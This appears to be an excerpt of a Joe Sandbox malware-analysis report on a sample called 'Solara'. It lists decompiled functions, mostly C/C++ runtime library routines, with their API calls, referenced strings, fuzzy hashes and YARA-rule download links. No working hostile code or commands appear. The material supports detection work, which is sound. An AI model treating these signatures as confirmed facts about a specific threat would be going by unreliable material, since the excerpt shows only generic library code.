Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 00C5C662

Strings

generic-type-, xrefs: 00C5C6E8
template-parameter-, xrefs: 00C5C6C1
@, xrefs: 00C5C7CE

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3676697650-1320211309
Opcode ID: 45c4bd1fda92ced4dcbd27628d05d34f49d75336707cfea62f1d60d1b4e3e90d
Instruction ID: afd90417860e2722ecfde1dcdd5284c405f4bd57004a43c77dbb38de5b1ad7bd
Opcode Fuzzy Hash: 45c4bd1fda92ced4dcbd27628d05d34f49d75336707cfea62f1d60d1b4e3e90d
Instruction Fuzzy Hash: AC61DA79D003059FDB14DFA5DC85BEEB7B8AF1C301F144019EA11A7291DB749A89CFA8

Function 00C5B86A Relevance: 15.3, APIs: 10, Instructions: 297COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C5B940
UnDecorator::getSignedDimension.LIBCMT ref: 00C5B94B
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BA37
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BA54
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BA71
DName::operator+.LIBCMT ref: 00C5BA86
UnDecorator::getSignedDimension.LIBCMT ref: 00C5BAA0
swprintf.LIBCMT ref: 00C5BB1A
DName::operator+.LIBCMT ref: 00C5BB75

Part of subcall function 00C578F8: DName::DName.LIBVCRUNTIME ref: 00C57956

DName::DName.LIBVCRUNTIME ref: 00C5BBEC

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 2e989f6f4d6642f7be11130945a2ee42d6d47b212310a1033e4146200ea0083b
Instruction ID: 64dcc160dd7720cff67b8ea5243d91d6a133532a1afad7f0e2bec34e43379e6d
Opcode Fuzzy Hash: 2e989f6f4d6642f7be11130945a2ee42d6d47b212310a1033e4146200ea0083b
Instruction Fuzzy Hash: A891C8B9C0420A9ACB14EFB5C99AAFE7F78AF04302F204516F911A6191DB749FCCD758

Function 00C8A54C Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 487COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00C8A924

Strings

p, xrefs: 00C8A649
p, xrefs: 00C8A665
:, xrefs: 00C8A617
f, xrefs: 00C8A65E
p, xrefs: 00C8A6AB
f, xrefs: 00C8A6A4
f, xrefs: 00C8A642

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: __aulldiv
String ID: :$f$f$f$p$p$p
API String ID: 3732870572-1434680307
Opcode ID: f206ba3e5f4a0c66a684780045d84a2288f9aabcae7469bca604b464bd5ea39c
Instruction ID: 2f24d5e842f4f40e7d02b247c25c88c0aaffa1aba4ca28ad6c1d46d25982dfa9
Opcode Fuzzy Hash: f206ba3e5f4a0c66a684780045d84a2288f9aabcae7469bca604b464bd5ea39c
Instruction Fuzzy Hash: 5802AF359002099BEF24AF65C5446EDB772FF00B1CFA48117E4257B280D7349E86DB6E

Function 00C54D36 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00C54E55
___TypeMatch.LIBVCRUNTIME ref: 00C54F63
CatchIt.LIBVCRUNTIME ref: 00C54FB4
CallUnexpected.LIBVCRUNTIME ref: 00C550D0

Strings

csm, xrefs: 00C54DE0
csm, xrefs: 00C54E8C
csm, xrefs: 00C54D73

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2356445960-393685449
Opcode ID: ca56c441fc42f1086d8d567632cdfdd50b4720a92a9c3d8984b6abf261c4e0d4
Instruction ID: e5053287230a3dceb35bd7d800ba57b4164744f2f88c43433cf0c4724efddaf7
Opcode Fuzzy Hash: ca56c441fc42f1086d8d567632cdfdd50b4720a92a9c3d8984b6abf261c4e0d4
Instruction Fuzzy Hash: 0BB1BB39800209EFCF18DFA4C8819AEBBB5FF44316F144159EC256B252D331DAD9DB99

Function 00C90CB6 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00C90F2F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 9986b53a0c2e40475183fa1a71e9a6e9291be2ce6e87f4cc46c58a23015e6f05
Instruction ID: 78d5dfd1f0addcec7cd8ea1f436496d21432a0666481b0379ad136d5ba78f027
Opcode Fuzzy Hash: 9986b53a0c2e40475183fa1a71e9a6e9291be2ce6e87f4cc46c58a23015e6f05
Instruction Fuzzy Hash: B2B12670A04249AFDF21DFD9C889BBE7BB1BF45300F248258E955A7392C7719E42CB61

Function 00C4185F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C41866
_Maklocstr.LIBCPMT ref: 00C418CD
_Maklocstr.LIBCPMT ref: 00C418DF
_Maklocchr.LIBCPMT ref: 00C418F7
_Maklocchr.LIBCPMT ref: 00C41907

Strings

false, xrefs: 00C418C8
true, xrefs: 00C418DA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID: false$true
API String ID: 2404127365-2658103896
Opcode ID: a97434da445ef1455bb2eb58a92e6b31e648a9670c110319c5ba33835b002222
Instruction ID: 93d0da219645f1815f246dc6f1755bc7dc00d7f1e7c793aca991823eb68f222e
Opcode Fuzzy Hash: a97434da445ef1455bb2eb58a92e6b31e648a9670c110319c5ba33835b002222
Instruction Fuzzy Hash: 83217AB5C00344AADF14EFA1D88599BBBB8FF45700F04855AF8159F252EA70D644DF60

Function 00C2AA32 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2AA39
int.LIBCPMT ref: 00C2AA54

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

int.LIBCPMT ref: 00C2AAB9
int.LIBCPMT ref: 00C2AAFE
int.LIBCPMT ref: 00C2AB41
int.LIBCPMT ref: 00C2ABB2
_Yarn.LIBCPMT ref: 00C2AC30

Part of subcall function 00C21AF8: __Getctype.LIBCPMT ref: 00C21B07

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$GetctypeH_prolog3Lockit::_Lockit::~_Yarn
String ID:
API String ID: 3817491809-0
Opcode ID: 8dc5db255ca6f1da886ce794c56f238d557fca3c122e669c9ecf275908375a6d
Instruction ID: 5f92b61e501d06958c88a9a6a3a0e2a809a72d612a1c0057f78e75fd98056fd7
Opcode Fuzzy Hash: 8dc5db255ca6f1da886ce794c56f238d557fca3c122e669c9ecf275908375a6d
Instruction Fuzzy Hash: 0D5106B1800236ABDB10BF65AD46A7F7BB9FF11310F044029F915A7A42DB708A40F7A3

Function 00C57C87 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C57D15
DName::operator+.LIBCMT ref: 00C57D68

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

Part of subcall function 00C566AD: DName::operator+.LIBCMT ref: 00C566CE

DName::operator+.LIBCMT ref: 00C57D59
DName::operator+.LIBCMT ref: 00C57DB9
DName::operator+.LIBCMT ref: 00C57DC6
DName::operator+.LIBCMT ref: 00C57E0D
DName::operator+.LIBCMT ref: 00C57E1A

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 8084b4e47bf14e4100ba6e44a7134e43ae17b3d865b626439f6cdc5ce8df08a9
Instruction ID: 4837303e73ea1f51fec1c2f749c8c899e5657819dd91eab6f0d6d6a5c4718d09
Opcode Fuzzy Hash: 8084b4e47bf14e4100ba6e44a7134e43ae17b3d865b626439f6cdc5ce8df08a9
Instruction Fuzzy Hash: 275186B9D04218ABDF15DB94D845EFEBBB8EF08301F54415AF901A7181DB709ACCDBA4

Function 00C54500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C54537
___except_validate_context_record.LIBVCRUNTIME ref: 00C5453F
_ValidateLocalCookies.LIBCMT ref: 00C545C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00C545F3
_ValidateLocalCookies.LIBCMT ref: 00C54648

Strings

csm, xrefs: 00C545DD

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b306b47e3f3c47525257fd14c91b3acf545b71fe33dfa018356017b980f9b2f9
Instruction ID: f02a30a4941ed24353c7120d0b9f77a95e74a4abc9463107b7cfc0d210391ed0
Opcode Fuzzy Hash: b306b47e3f3c47525257fd14c91b3acf545b71fe33dfa018356017b980f9b2f9
Instruction Fuzzy Hash: 1B41D238A002089FCF04DF68C884A9EBBB1AF4531DF548155EC14AB292D731EED9CF94

Function 00C41786 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C4178D
_Maklocstr.LIBCPMT ref: 00C417F6
_Maklocstr.LIBCPMT ref: 00C41808
_Getvals.LIBCPMT ref: 00C41852

Strings

false, xrefs: 00C417F1
true, xrefs: 00C41803

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 1611767717-2658103896
Opcode ID: 69213f1ead1512569c21180c2ef9c20eb0c97d12e7e1f5169e334097d6634e18
Instruction ID: d4738d97f9aff3d4b69ae9e3b7ab8356cd9764202a00b8c71def67229fa1b168
Opcode Fuzzy Hash: 69213f1ead1512569c21180c2ef9c20eb0c97d12e7e1f5169e334097d6634e18
Instruction Fuzzy Hash: 532162B1D00318ABDF14EFA5E885ADFBBA8FF05750F04815AF9189F152DBB08644DBA1

Function 00C8B7D9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00C8B8E6,?,?,00000000,00000000,?,?,00C8BCAD,00000021,FlsSetValue,00CAE9FC,00CAEA04,00000000), ref: 00C8B89A

Strings

ext-ms-, xrefs: 00C8B844
api-ms-, xrefs: 00C8B830

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 6e31e954573786513210bf2cf2ed841cf29262725e7d145fc8f05673e1e83807
Instruction ID: 4cea316a26b5e2a61791185d52967109da83c3e792a203698ea55310100e361e
Opcode Fuzzy Hash: 6e31e954573786513210bf2cf2ed841cf29262725e7d145fc8f05673e1e83807
Instruction Fuzzy Hash: 7721E735A01226BBCB21AB65DC45BAE376CDF437ACB150120F915A72E0D730EE00C7E8

Function 00C29E73 Relevance: 10.6, APIs: 7, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C29E7A
std::_Lockit::_Lockit.LIBCPMT ref: 00C29E84
int.LIBCPMT ref: 00C29E9B

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

numpunct.LIBCPMT ref: 00C29EBE
std::_Facet_Register.LIBCPMT ref: 00C29ED5
std::_Lockit::~_Lockit.LIBCPMT ref: 00C29EF5
Concurrency::cancel_current_task.LIBCPMT ref: 00C29F02

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: dc06b116a5a11d0e8fb78dc999f28b4b8cbd044af286c3a312e76b1d78185b56
Instruction ID: 654a3e45e61c2d082f9de54476dec35691ae347da103c2760e3d3865cf72e06e
Opcode Fuzzy Hash: dc06b116a5a11d0e8fb78dc999f28b4b8cbd044af286c3a312e76b1d78185b56
Instruction Fuzzy Hash: 89113636900235ABCB00EBA4E811BAEB7B5EF84330F148419F91197B91CF719E41D7E1

Function 00C24C88 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C24C8F
std::_Lockit::_Lockit.LIBCPMT ref: 00C24C99
int.LIBCPMT ref: 00C24CB0

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

codecvt.LIBCPMT ref: 00C24CD3
std::_Facet_Register.LIBCPMT ref: 00C24CEA
std::_Lockit::~_Lockit.LIBCPMT ref: 00C24D0A
Concurrency::cancel_current_task.LIBCPMT ref: 00C24D17

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 9cef119f129ce54be326e9521de3d249a1c0dfa4ba6dec9d8426b9f455c82f65
Instruction ID: dd75d306cfc970b5a62748f4348bde7e785002b0b6c6d726832e43746b900164
Opcode Fuzzy Hash: 9cef119f129ce54be326e9521de3d249a1c0dfa4ba6dec9d8426b9f455c82f65
Instruction Fuzzy Hash: 5611D371900639ABCF08BBA8E802BAE7BB5EF44720F144019F804AB791DF709E41DBD0

Function 00C4A46C Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A473
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A47D
int.LIBCPMT ref: 00C4A494

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

messages.LIBCPMT ref: 00C4A4B7
std::_Facet_Register.LIBCPMT ref: 00C4A4CE
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A4EE
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A4FB

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
String ID:
API String ID: 958335874-0
Opcode ID: b200d36dcba031b41f897b7dea2c3ecccfeeb941d5016743896ae3b2fe5f3633
Instruction ID: 45f2424a60f1c6c99ec919b56e8fc184b68dd75ff127c2adaf6f7f3c80257553
Opcode Fuzzy Hash: b200d36dcba031b41f897b7dea2c3ecccfeeb941d5016743896ae3b2fe5f3633
Instruction Fuzzy Hash: 3901F5359002259BCF05FBA4E816AFE77B1FF94310F148408F911AB791CF749E429B92

Function 00C4A6C0 Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A6C7
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A6D1
int.LIBCPMT ref: 00C4A6E8

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C4A70B
std::_Facet_Register.LIBCPMT ref: 00C4A722
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A742
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A74F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 9d10cdc60bb29edd37b4db82415859a1403e1ff12d5215a75ad22456e921fc7a
Instruction ID: 04b273f9d48b50f16896eb2153e84415e871482af38fb9b04949bc8ecd1c6d62
Opcode Fuzzy Hash: 9d10cdc60bb29edd37b4db82415859a1403e1ff12d5215a75ad22456e921fc7a
Instruction Fuzzy Hash: 6801C0359002259BCB04EBA4E856AAE7772BF84324F240108E910AB3D1DF749E81D791

Function 00C4A62B Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4A632
std::_Lockit::_Lockit.LIBCPMT ref: 00C4A63C
int.LIBCPMT ref: 00C4A653

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

moneypunct.LIBCPMT ref: 00C4A676
std::_Facet_Register.LIBCPMT ref: 00C4A68D
std::_Lockit::~_Lockit.LIBCPMT ref: 00C4A6AD
Concurrency::cancel_current_task.LIBCPMT ref: 00C4A6BA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
String ID:
API String ID: 3376033448-0
Opcode ID: 0d6c86d0072b7a4a64366bfbbd72b37dae3f28b7ff98f0b5fa20469d23ac72bf
Instruction ID: 31a47854958e22d63589bd66205b12e19faa36ec26a2ed5907e9d1185d227a5c
Opcode Fuzzy Hash: 0d6c86d0072b7a4a64366bfbbd72b37dae3f28b7ff98f0b5fa20469d23ac72bf
Instruction Fuzzy Hash: 2601D2399402259BCB04FBA4E812AEE7776BF94314F194109F911AB391DF309E069B91

Function 00C3C7DA Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C7E1
std::_Lockit::_Lockit.LIBCPMT ref: 00C3C7EB
ctype.LIBCPMT ref: 00C3C825
std::_Facet_Register.LIBCPMT ref: 00C3C83C
std::_Lockit::~_Lockit.LIBCPMT ref: 00C3C85C
Concurrency::cancel_current_task.LIBCPMT ref: 00C3C869
int.LIBCPMT ref: 00C3C802

Part of subcall function 00C2191F: std::_Lockit::_Lockit.LIBCPMT ref: 00C21930
Part of subcall function 00C2191F: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2194A

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: cf9d49a775f3490270b552e1aaaeb8a2f1bd32f3f061fba0fd71a356f06a01b5
Instruction ID: 56b593fcb4aa7de5d291d5bfdea7a88f8533c0fbcf1bd55783a977012aca1763
Opcode Fuzzy Hash: cf9d49a775f3490270b552e1aaaeb8a2f1bd32f3f061fba0fd71a356f06a01b5
Instruction Fuzzy Hash: CA01D2359002269BCB05FBA4E855AFDB7B1AF88714F184008E911AB7D1CF749E46A791

Function 00C3C86F Relevance: 10.5, APIs: 7, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3C876
